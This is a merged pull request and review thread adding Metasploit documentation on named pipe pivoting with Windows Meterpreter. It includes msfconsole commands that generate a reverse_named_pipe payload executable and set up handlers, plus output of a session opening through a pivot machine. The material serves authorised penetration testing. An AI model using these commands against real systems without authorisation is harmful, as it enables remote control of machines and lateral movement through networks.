### PR TITLE
Add named pipe pivot documentation

### PR DESCRIPTION
**Pull request by adfoster-r7**
Adding docs on named pipe pivoting for Windows Meterpreter

### CODE REVIEW

File: docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md [hunk 1]
```diff
@@ -210,11 +214,42 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
...
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine:
+
+```
+msf6 > use windows/x64/meterpreter/reverse_named_pipe
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -o named_pipe_example.exe -f exe pipehost=169.254.16.221 pipename=msfpipe
+[*] Writing 7168 bytes to named_pipe_example.exe...
+```
+
+After running the payload on the final Windows 2019 target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
```
Comment (adfoster-r7) [inline docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md:245]: cc @gwillcox-r7 - I aligned with the network topology described in the intro, but potentially worth a double check from yourself that this meets up with expectations 😄

I was thinking it'd be nice to add the output of the `sessions` command as it shows really nicely `via pivot (x.y.x.z ...)` in the table output but I didn't have the cycles to mock it out for your test lab, is this a lab you've got sitting around still? Potentially we can grab it from your real setup 👀

Comment (gwillcox-r7) [reply docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md:245]: @adfoster-r7 Unfortunately don't have the environment alive anymore due to some issue that corrupted my Windows 2019 install and prevented it from booting however we can probably set something similar up again if needs be.

File: docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md [hunk 2]
```diff
@@ -210,11 +214,42 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
...
+[+] Successfully created pipe pivot.
+meterpreter >
+```
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine:
+
+```
+msf6 > use windows/x64/meterpreter/reverse_named_pipe
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -o named_pipe_example.exe -f exe pipehost=169.254.16.221 pipename=msfpipe
+[*] Writing 7168 bytes to named_pipe_example.exe...
```
Comment (bwatters-r7) [inline docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md:242]: You may want to add a section on the handler, as this is a bit unclear and non-intuitive, IMO:

When you launch the named pipe payload, you need to have a listener open to receive the connection.  The `reverse_named_pipe` payload will start a payload when you run `to_handler`:
```
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > jobs -l

Jobs
====

  Id  Name                    Payload                                     Payload opts
  --  ----                    -------                                     ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp         tcp://10.5.135.101:4578
  2   Exploit: multi/handler  windows/x64/meterpreter/reverse_named_pipe
```
Unfortunately, that handler is not used by the named_pipe_payload.  Note that the callback is to the _original_ handler from the intermediate session:
```
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 4 opened (Pivot via [10.5.135.101:4578 -> 10.5.132.101:51057]) at 2022-06-06 14:05:38 -0500
```

Ensure you have a handler open from the intermediate stage.

**Comment by bwatters-r7** [comment]
Updated: https://github.com/adfoster-r7/metasploit-framework/pull/8

**Comment by bwatters-r7** [comment]
@adfoster-r7 I'm happy to merge the PR I put up and land this if it works for you.

**Comment by adfoster-r7** [comment]
@bwatters-r7 Merged, thanks! 🎉

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

**Pull request merged**